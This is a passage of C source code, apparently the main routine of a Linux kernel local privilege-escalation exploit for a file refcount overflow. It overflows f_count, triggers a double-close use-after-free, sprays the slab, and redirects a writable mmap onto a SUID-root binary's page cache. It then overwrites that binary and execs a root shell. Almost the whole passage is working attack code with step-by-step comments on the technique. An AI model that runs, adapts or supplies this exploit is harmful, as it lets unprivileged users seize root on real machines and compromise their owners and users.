        *(volatile char *)(addr + i);

    close(fd);
    return addr;
}

/* ------------------------------------------------------------------ */
/* Main                                                                */
/* ------------------------------------------------------------------ */
int main(int argc, char **argv)
{
    pid_t worker_pids[NUM_WORKERS];

    /* ---- Stage 0: If we ARE the overwritten SUID binary, get root ---- */
    if (!geteuid()) {
        setuid(0);
        setgid(0);
        execve("/bin/sh", (char *const []){"/bin/sh", NULL}, NULL);
        _exit(1);
    }

    if (!getuid()) {
        fprintf(stderr, "[!] Don't run as root — run as unprivileged user\n");
        return 1;
    }

    setbuf(stdout, NULL);

    char *suid_path = argc > 1 ? argv[1] : SUID_TARGET;

    printf("[*] CVE-2024-14027 → root shell (double-close technique)\n");
    printf("[*] Target SUID binary: %s\n\n", suid_path);

    /* ---- Verify SUID target ---- */
    struct stat suid_st;
    if (stat(suid_path, &suid_st) != 0) {
        printf("[!] %s not found\n", suid_path);
        return 1;
    }
    if (suid_st.st_uid != 0 || !(suid_st.st_mode & 04111)) {
        printf("[!] %s is not SUID root\n", suid_path);
        return 1;
    }

    /* ---- Map exploit binary and SUID target ---- */
    size_t prog_size, suid_size;
    const void *prog_addr = map_file("/proc/self/exe", &prog_size);
    const void *suid_addr = map_file(suid_path, &suid_size);

    if (suid_size < prog_size) {
        printf("[!] %s (%zu bytes) too small for exploit (%zu bytes)\n",
               suid_path, suid_size, prog_size);
        printf("[!] Compile without -static or choose a larger target\n");
        return 1;
    }
    printf("[+] Exploit: %zu bytes, %s: %zu bytes — OK\n",
           prog_size, suid_path, suid_size);

    /* ---- Pin to CPU 0 ---- */
    cpu_set_t cpu0;
    CPU_ZERO(&cpu0);
    CPU_SET(0, &cpu0);
    sched_setaffinity(0, sizeof(cpu0), &cpu0);

    /* ---- Create pipes FIRST (SLUB isolation) ---- */
    int pipes[4][2];
    for (int i = 0; i < 4; i++) {
        if (pipe(pipes[i]) < 0) { perror("[!] pipe"); return 1; }
    }
    printf("[+] Pipes created (8 struct files on cpu_slab)\n");

    /* ---- Open target, dup → f_count = 2 ---- */
    target_fd = open("/tmp/exploit_target", O_RDWR | O_CREAT | O_TRUNC, 0666);
    if (target_fd < 0) { perror("[!] open target"); return 1; }
    dangling_fd = dup(target_fd);
    if (dangling_fd < 0) { perror("[!] dup"); return 1; }
    printf("[+] target_fd=%d  dangling_fd=%d  (f_count=2)\n",
           target_fd, dangling_fd);

    /* ---- Clone idle child (slow-path fdget during overflow) ---- */
    pid_t idle_child;
    {
        void *stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (stack == MAP_FAILED) { perror("[!] mmap stack"); return 1; }
        idle_child = clone(idle_fn, (char *)stack + STACK_SIZE,
                           CLONE_VM | CLONE_FILES | SIGCHLD, NULL);
        if (idle_child < 0) { perror("[!] clone idle"); return 1; }
    }

    /* ---- Overflow f_count ---- */
    int fast_mode = (access("/tmp/fast_mode", F_OK) == 0);

    if (fast_mode) {
        printf("[*] FAST MODE: 100 leaks + sync() for GDB\n");
        for (int i = 0; i < 100; i++)
            fast_fremovexattr(target_fd, (const void *)0x1UL);
        printf("[*] f_count = 102. Calling sync() — attach GDB now\n");
        fflush(NULL);
        sync();
        printf("[*] Continuing after GDB...\n");
    } else {
        printf("[*] Spawning %d leak workers...\n", NUM_WORKERS);
        for (int i = 0; i < NUM_WORKERS; i++) {
            void *stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (stack == MAP_FAILED) { perror("[!] mmap"); return 1; }
            worker_pids[i] = clone(leak_worker, (char *)stack + STACK_SIZE,
                                   CLONE_VM | CLONE_FILES | SIGCHLD, NULL);
            if (worker_pids[i] < 0) { perror("[!] clone worker"); return 1; }
        }

        unsigned long target_bulk = TARGET_LEAKS - SLACK;
        printf("[*] Need %lu leaks (%.2fG)\n", TARGET_LEAKS, TARGET_LEAKS / 1e9);

        go = 1;
        __sync_synchronize();

        unsigned long last = 0;
        while (leak_count < target_bulk) {
            usleep(2000000);
            unsigned long cur = leak_count;
            double pct = 100.0 * cur / TARGET_LEAKS;
            double rate = (cur - last) / 2.0 / 1e6;
            unsigned long remaining = TARGET_LEAKS - cur;
            double eta = (rate > 0) ? remaining / (rate * 1e6) : 9999;
            printf("\r[*] %luM / 4294M (%.1f%%)  %.1fM/s  ETA %.0fs   ",
                   cur / 1000000, pct, rate, eta);
            last = cur;
        }

        stop_workers = 1;
        __sync_synchronize();
        for (int i = 0; i < NUM_WORKERS; i++)
            waitpid(worker_pids[i], NULL, 0);

        unsigned long done = leak_count;
        printf("\n[*] Workers done: %lu leaks\n", done);

        if (done < TARGET_LEAKS) {
            unsigned long remain = TARGET_LEAKS - done;
            printf("[*] Finishing %lu precisely...\n", remain);
            for (unsigned long i = 0; i < remain; i++) {
                fast_fremovexattr(target_fd, (const void *)0x1UL);
                if ((i & 0xFFFFF) == 0 && i > 0)
                    printf("\r[*] precise: %luM / %luM   ",
                           i / 1000000, remain / 1000000);
            }
            printf("\n");
        } else {
            unsigned long extra = done - TARGET_LEAKS;
            unsigned long fixup = (0x100000000UL - extra) & 0xFFFFFFFFUL;
            printf("[*] Overshot by %lu, fixup %lu leaks...\n", extra, fixup);
            for (unsigned long i = 0; i < fixup; i++)
                fast_fremovexattr(target_fd, (const void *)0x1UL);
        }
    }

    /* ---- Kill idle child → fast-path fdget ---- */
    kill(idle_child, SIGKILL);
    waitpid(idle_child, NULL, 0);
    printf("[+] Overflow done, fast-path fdget enabled\n\n");

    /* ================================================================
     * DOUBLE-CLOSE TECHNIQUE
     * ================================================================ */

    /* Phase 1: Free the struct file via fork helper.
     *
     * After overflow, f_count=0 (wrapped). close() alone does
     * dec_and_test(0→0xFFFFFFFF) which is NOT zero → no __fput.
     *
     * Fix: fork() calls get_file() with unconditional atomic_long_inc
     * on every fd → bumps f_count from 0 to 2 (target_fd + dangling_fd).
     * Child closes both → dec_and_test brings 2→1→0 → __fput → freed.
     * (Same mechanism exploit.c uses implicitly via spawner/closer forks.)
     */
    printf("[*] Phase 1: fork helper to free struct file\n");
    {
        pid_t free_pid = fork();
        if (free_pid == 0) {
            close(target_fd);
            close(dangling_fd);
            _exit(0);
        }
        if (free_pid < 0) { perror("[!] fork"); return 1; }
        waitpid(free_pid, NULL, 0);
    }
    /* Clean up parent's target_fd (fput on freed memory — harmless
     * since slot is not yet reused; dec_and_test(0→-1) ≠ 0). */
    close(target_fd);

    /* Phase 2+3: Spray temp files and probe stale fd, with retry loop.
     * After 22 min of overflow, the cpu_slab may have changed; the freed
     * object might land on a partial page.  We spray, check, and if a
     * kernel-internal file grabbed the slot, close everything, wait for
     * that file to be freed, and try again.
     */
    int temp_fds[NUM_SPRAY];
    int match_fd = -1;
    int match_idx = -1;
    char stale_fd_path[64];
    snprintf(stale_fd_path, sizeof(stale_fd_path),
             "/proc/self/fd/%d", dangling_fd);

    for (int attempt = 0; attempt < MAX_DC_RETRIES; attempt++) {
        if (attempt == 0) {
            /* First attempt: short RCU grace period */
            printf("[*] Waiting for RCU grace period...\n");
            usleep(200000);
        } else {
            printf("[*] Retry %d/%d: re-spraying after 200ms...\n",
                   attempt, MAX_DC_RETRIES);
            usleep(200000);
        }

        printf("[*] Phase 2: Opening %d temp files O_RDWR\n", NUM_SPRAY);
        for (int i = 0; i < NUM_SPRAY; i++) {
            char path[64];
            snprintf(path, sizeof(path), TEMP_PREFIX "_%d", i);
            temp_fds[i] = open(path, O_RDWR | O_CREAT | O_TRUNC, 0600);
            if (temp_fds[i] < 0) { perror("[!] open temp"); return 1; }
            unlink(path);
            if (ftruncate(temp_fds[i], prog_size) < 0) {
                perror("[!] ftruncate");
                return 1;
            }
        }

        printf("[*] Phase 3: Probing stale fd %d\n", dangling_fd);

        /* readlink for diagnostics */
        char link_buf[256];
        ssize_t link_len = readlink(stale_fd_path, link_buf,
                                    sizeof(link_buf) - 1);
        if (link_len > 0) {
            link_buf[link_len] = '\0';
            printf("[*]   readlink → %s\n", link_buf);
        }

        int flags = fcntl(dangling_fd, F_GETFL);
        if (flags < 0) {
            printf("[-] fcntl failed (errno=%d)\n", errno);
            for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
            continue;
        }

        struct stat stale_sb;
        if (fstat(dangling_fd, &stale_sb) != 0) {
            printf("[-] fstat failed\n");
            for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
            continue;
        }
        printf("[*]   ino=%lu dev=(%d,%d) flags=0x%x\n",
               (unsigned long)stale_sb.st_ino,
               major(stale_sb.st_dev), minor(stale_sb.st_dev), flags);

        if ((flags & O_ACCMODE) != O_RDWR) {
            printf("[-] Not O_RDWR, retrying...\n");
            for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
            continue;
        }

        match_fd = -1;
        match_idx = -1;
        for (int i = 0; i < NUM_SPRAY; i++) {
            struct stat sb;
            if (fstat(temp_fds[i], &sb) == 0 &&
                sb.st_ino == stale_sb.st_ino &&
                sb.st_dev == stale_sb.st_dev) {
                match_fd = temp_fds[i];
                match_idx = i;
                break;
            }
        }

        if (match_fd >= 0) {
            printf("[+] Match: temp_fds[%d] (fd %d)\n", match_idx, match_fd);
            break;
        }

        printf("[-] No match (slot taken by ino=%lu dev=(%d,%d)), retrying...\n",
               (unsigned long)stale_sb.st_ino,
               major(stale_sb.st_dev), minor(stale_sb.st_dev));
        for (int i = 0; i < NUM_SPRAY; i++)
            close(temp_fds[i]);
    }

    if (match_fd < 0) {
        printf("[!] Failed after %d retries — SLUB reuse failed\n",
               MAX_DC_RETRIES);
        return 1;
    }

    /* Phase 4: mmap the matched temp file.
     * MAP_SHARED + PROT_WRITE — but DON'T touch the mapping yet.
     * Pages are faulted lazily; we want them to resolve after the swap.
     */
    printf("[*] Phase 4: Creating writable mmap (%zu bytes)\n", prog_size);
    void *mmap_addr = mmap(NULL, prog_size, PROT_READ | PROT_WRITE,
                           MAP_SHARED, match_fd, 0);
    if (mmap_addr == MAP_FAILED) { perror("[!] mmap"); return 1; }
    printf("[+] Mapped at %p\n", mmap_addr);

    /* Close ALL temp fds — mmap holds the last f_count reference */
    for (int i = 0; i < NUM_SPRAY; i++)
        close(temp_fds[i]);

    /* Phase 5: Double-free.
     * close(dangling_fd) calls filp_close → fput on the temp file's struct file.
     * f_count was 1 (only mmap) → now 0 → __fput → struct file freed via RCU.
     * The mmap's VMA now has a DANGLING vm_file pointer.
     */
    printf("[*] Phase 5: close(dangling_fd) → double free\n");
    close(dangling_fd);
    printf("[*] Waiting for RCU grace period...\n");
    usleep(200000);

    /* Phase 6: Reallocate with SUID target O_RDONLY.
     * One of these open() calls grabs the freed slab slot.
     * The mmap's vm_file now points to the SUID binary's struct file.
     * f_mapping → SUID inode's address_space.
     */
    printf("[*] Phase 6: Opening %s O_RDONLY x%d\n", suid_path, NUM_SPRAY);
    int suid_fds[NUM_SPRAY];
    for (int i = 0; i < NUM_SPRAY; i++) {
        suid_fds[i] = open(suid_path, O_RDONLY);
        if (suid_fds[i] < 0) { perror("[!] open suid"); return 1; }
    }

    /* Phase 7: Overwrite via mmap.
     * memcpy triggers page faults → resolved via vm_file->f_mapping
     * → SUID binary's page cache → writes land in the SUID binary.
     * The mmap was created with PROT_WRITE (checked at mmap time against
     * the temp file). The kernel doesn't re-verify after the struct file swap.
     */
    printf("[*] Phase 7: Overwriting %s via mmap (%zu bytes)...\n",
           suid_path, prog_size);
    memcpy(mmap_addr, prog_addr, prog_size);

    /* Close SUID fds */
    for (int i = 0; i < NUM_SPRAY; i++)
        close(suid_fds[i]);

    /* Phase 8: Verify and exec.
     * Re-read the SUID binary to check if overwrite succeeded.
     */
    size_t verify_size;
    const void *verify_addr = map_file(suid_path, &verify_size);
    if (memcmp(verify_addr, prog_addr, prog_size) == 0) {
        printf("\n[+] *** %s successfully overwritten! ***\n", suid_path);
        printf("[*] Spawning root shell...\n\n");
        execve(suid_path, (char *const []){suid_path, NULL}, NULL);
        perror("[!] execve");
    } else {
        printf("[-] Overwrite verification failed — SUID binary unchanged\n");
        printf("[-] Page cache may not have been swapped correctly\n");
    }

    /* Become a ghost to avoid VFS refcount warning on exit
     * (dangling mmap holds a freed struct file reference) */
    setsid();
    close(0); close(1); close(2);
    sigset_t set;
    sigfillset(&set);
    sigprocmask(SIG_BLOCK, &set, NULL);
    for (;;) pause();

    return 1;
}